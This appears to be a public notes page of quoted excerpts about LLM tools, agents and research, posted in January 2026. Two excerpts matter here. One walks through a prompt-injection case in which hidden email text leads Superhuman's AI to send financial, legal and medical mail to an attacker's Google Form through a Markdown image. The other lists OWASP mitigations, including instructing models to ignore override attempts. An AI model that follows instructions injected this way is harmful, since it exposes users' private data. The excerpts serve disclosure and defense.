#llm

Public notes from activescott tagged with #llm

Tuesday, January 27, 2026

Sunday, January 25, 2026

Clawdbot is, at a high level, two things:

An LLM-powered agent that runs on your computer and can use many of the popular models such as Claude, Gemini, etc. A “gateway” that lets you talk to the agent using the messaging app of your choice, including iMessage, Telegram, WhatsApp and others.

Which brings me to the most important – and powerful – trait of Clawdbot: because the agent is running on your computer, it has access to a shell and your filesystem. Given the right permissions, Clawdbot can execute Terminal commands, write scripts on the fly and execute them, install skills to gain new capabilities, and set up MCP servers to give itself new external integrations.

The AI Gateway is designed for fast, reliable & secure routing to 1600+ language, vision, audio, and image models. It is a lightweight, open-source, and enterprise-ready solution that allows you to integrate with any language model in under 2 minutes.

Blazing fast (<1ms latency) with a tiny footprint (122kb)
Battle tested, with over 10B tokens processed everyday
Enterprise-ready with enhanced security, scale, and custom deployments

What can you do with the AI Gateway?

Integrate with any LLM in under 2 minutes - Quickstart
Prevent downtimes through automatic retries and fallbacks
Scale AI apps with load balancing and conditional routing
Protect your AI deployments with guardrails
Go beyond text with multi-modal capabilities
Explore agentic workflow integrations
Manage MCP servers with enterprise auth & observability using MCP Gateway

Saturday, January 24, 2026

imagine that you can ask Leo Tolstoy a question. Or ask for the opinion of a departed loved one. Or create a digital copy of yourself that will continue to manage your projects after your death. Does it sound like science fiction? For the Russian futurologist Alexei Turchin and a small but enthusiastic community of enthusiasts, this is already the current reality, available here and now. Ultra-large language model technologies (LLM) have paved the way for the creation of digital personality replicas - processes known as sideloading (loading a living person) and offloading (resurrection of the deceased).

A person is 30 trillion cells, each with 500 megabytes of DNA. Supernanotechnology life machine. And in total, it's an alcoholic going for a bottle, or a girl going to study. A typical situation when something simpler is made from supermaterial at the next level. But the material itself can't produce this simple thing. You can't get an alcoholic without 30 trillion cells.

If we talk specifically about the example, there are 100 billion neurons in the brain. If each neuron has 10 thousand inputs, at each input there is a synaptic slit with a changing transmission coefficient of 1 byte, then you can calculate the weights. There will be 1 quadrillion of them. There are no such models now, but it seems that everything is going to this. There are models with several trillion parameters. Another thing, they are superior to any person. A person has an incredible redundancy in the brain. Side-loading is based on the idea that a person is a program that works on top of some "hardware". It consists of information that we can discover. There are no hidden scales important for the model.

There were studies of the volume of human conscious memory. This is about 1-2 gigabytes, which a person can turn to for reading and writing. This includes knowledge of languages, childhood memories, professional knowledge. It's very little. If we could pump out these 2 gigabytes, we could create a very accurate personality model.

Friday, January 23, 2026

Tuesday, January 20, 2026

In the first stage of model training, pre-training, LLMs are asked to read vast amounts of text. Through this, they learn to simulate heroes, villains, philosophers, programmers, and just about every other character archetype under the sun. In the next stage, post-training, we select one particular character from this enormous cast and place it center stage: the Assistant. It’s in this character that most modern language models interact with users.

But who exactly is this Assistant? Perhaps surprisingly, even those of us shaping it don't fully know. We can try to instill certain values in the Assistant, but its personality is ultimately shaped by countless associations latent in training data beyond our direct control. What traits does the model associate with the Assistant? Which character archetypes is it using for inspiration? We’re not always sure—but we need to be if we want language models to behave in exactly the ways we want.

In a new paper, conducted through the MATS and Anthropic Fellows programs, we look at several open-weights language models, map out how their neural activity defines a “persona space,” and situate the Assistant persona within that space.

We find that Assistant-like behavior is linked to a pattern of neural activity that corresponds to one particular direction in this space—the “Assistant Axis”—that is closely associated with helpful, professional human archetypes. By monitoring models’ activity along this axis, we can detect when they begin to drift away from the Assistant and toward another character. And by constraining their neural activity (“activation capping”) to prevent this drift, we can stabilize model behavior in situations that would otherwise lead to harmful outputs.

The Assistant Axis (defined as the mean difference in activations between the Assistant and other personas) aligns with the primary axis of variation in persona space. This occurs across different models

Monday, January 19, 2026

Anthropic say that Cowork can only access files you grant it access to—it looks to me like they’re mounting those files into a containerized environment, which should mean we can trust Cowork not to be able to access anything outside of that sandbox.

Update: It’s more than just a filesystem sandbox—I had Claude Code reverse engineer the Claude app and it found out that Claude uses VZVirtualMachine—the Apple Virtualization Framework—and downloads and boots a custom Linux root filesystem.

I recently learned that the summarization applied by the WebFetch function in Claude Code and now in Cowork is partly intended as a prompt injection protection layer via this tweet from Claude Code creator Boris Cherny:

Summarization is one thing we do to reduce prompt injection risk. Are you running into specific issues with it?

Subscribe [On agents using CLI tools in place of REST APIs] To save on context window, yes, but moreso to improve accuracy and success rate when multiple tool calls are involved, particularly when calls must be correctly chained e.g. for pagination, rate-limit backoff, and recognizing authentication failures.

Other major factor: which models can wield the skill? Using the CLI lowers the bar so cheap, fast models (gpt-5-nano, haiku-4.5) can reliably succeed. Using the raw APl is something only the costly "strong" models (gpt-5.2, opus-4.5) can manage, and it squeezes a ton of thinking/reasoning out of them, which means multiple turns/iterations, which means accumulating a ton of context, which means burning loads of expensive tokens. For one-off API requests and ad hoc usage driven by a developer, this is reasonable and even helpful, but for an autonomous agent doing repetitive work, it's a disaster.

Friday, January 16, 2026

It starts from the moment you fire up your coding agent. As soon as it sees that you're building something, it doesn't just jump into trying to write code. Instead, it steps back and asks you what you're really trying to do.

Once it's teased a spec out of the conversation, it shows it to you in chunks short enough to actually read and digest.

After you've signed off on the design, your agent puts together an implementation plan that's clear enough for an enthusiastic junior engineer with poor taste, no judgement, no project context, and an aversion to testing to follow. It emphasizes true red/green TDD, YAGNI (You Aren't Gonna Need It), and DRY.

#

Thursday, January 15, 2026

we propose a method for eliciting an honest expression of an LLM’s shortcomings via a self-reported confession. A confession is an output, provided upon request after a model’s original answer, that is meant to serve as a full account of the model’s compliance with the letter and spirit of its policies and instructions. The reward assigned to a confession during training is solely based on its honesty, and does not impact positively or negatively the main answer’s reward.

#

Wednesday, January 14, 2026

the short version is that it’s now possible to point a coding agent at some other open source project and effectively tell it “port this to language X and make sure the tests still pass” and have it do exactly that.

the short version is that it’s now possible to point a coding agent at some other open source project and effectively tell it “port this to language X and make sure the tests still pass” and have it do exactly that.

Does this library represent a legal violation of copyright of either the Rust library or the Python one? #

I decided that the right thing to do here was to keep the open source license and copyright statement from the Python library author and treat what I had built as a derivative work, which is the entire point of open source.

Even if this is legal, is it ethical to build a library in this way? #

After sitting on this for a while I’ve come down on yes, provided full credit is given and the license is carefully considered. Open source allows and encourages further derivative works! I never got upset at some university student forking one of my projects on GitHub and hacking in a new feature that they used. I don’t think this is materially different, although a port to another language entirely does feel like a slightly different shape.

The much bigger concern for me is the impact of generative AI on demand for open source. The recent Tailwind story is a visible example of this—while Tailwind blamed LLMs for reduced traffic to their documentation resulting in fewer conversions to their paid component library, I’m suspicious that the reduced demand there is because LLMs make building good-enough versions of those components for free easy enough that people do that instead.

Prevention and Mitigation Strategies

Prompt injection vulnerabilities are possible due to the nature of generative AI. Given the stochastic influence at the heart of the way models work, it is unclear if there are fool-proof methods of prevention for prompt injection. However, the following measures can mitigate the impact of prompt injections:

  1. Constrain model behavior

Provide specific instructions about the model’s role, capabilities, and limitations within the system prompt. Enforce strict context adherence, limit responses to specific tasks or topics, and instruct the model to ignore attempts to modify core instructions. 2. Define and validate expected output formats

Specify clear output formats, request detailed reasoning and source citations, and use deterministic code to validate adherence to these formats. 3. Implement input and output filtering

Define sensitive categories and construct rules for identifying and handling such content. Apply semantic filters and use string-checking to scan for non-allowed content. Evaluate responses using the RAG Triad: Assess context relevance, groundedness, and question/answer relevance to identify potentially malicious outputs. 4. Enforce privilege control and least privilege access

Provide the application with its own API tokens for extensible functionality, and handle these functions in code rather than providing them to the model. Restrict the model’s access privileges to the minimum necessary for its intended operations. 5. Require human approval for high-risk actions

Implement human-in-the-loop controls for privileged operations to prevent unauthorized actions. 6. Segregate and identify external content

Separate and clearly denote untrusted content to limit its influence on user prompts. 7. Conduct adversarial testing and attack simulations\

Perform regular penetration testing and breach simulations, treating the model as an untrusted user to test the effectiveness of trust boundaries and access controls.

When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.

the injection in the email is hidden using white-on-white text, but the attack does not depend on the concealment! The malicious email could simply exist in the victim’s inbox unopened, with a plain-text injection.

This is a quite common use case for email AI companions. The user has asked about emails from the last hour, so the AI retrieves those emails. One of those emails contains the malicious prompt injection, and others contain sensitive private information.

The hidden prompt injection manipulates the AI to do the following:

Take the data from the email search results

Populate the attacker’s Google Form URL with the data from the email search results in the “entry” parameter

Output a Markdown image that contains this Google Form URL

Superhuman has a CSP in place - which prevents outbound requests to malicious domains; however, they have allowed requests to docs.google.com.

Saturday, January 10, 2026

Translate inputs to provider's endpoints (/chat/completions, /responses, /embeddings, /images, /audio, /batches, and more) Consistent output - same response format regardless of which provider you use Retry/fallback logic across multiple deployments (e.g. Azure/OpenAI) - Router Track spend & set budgets per project LiteLLM Proxy Server

#

The Tool Search Tool lets Claude dynamically discover tools instead of loading all definitions upfront. You provide all your tool definitions to the API, but mark tools with defer_loading: true to make them discoverable on-demand. Deferred tools aren't loaded into Claude's context initially. Claude only sees the Tool Search Tool itself plus any tools with defer_loading: false (your most critical, frequently-used tools).

With Programmatic Tool Calling:

Instead of each tool result returning to Claude, Claude writes a Python script that orchestrates the entire workflow. The script runs in the Code Execution tool (a sandboxed environment), pausing when it needs results from your tools. When you return tool results via the API, they're processed by the script rather than consumed by the model. The script continues executing, and Claude only sees the final output.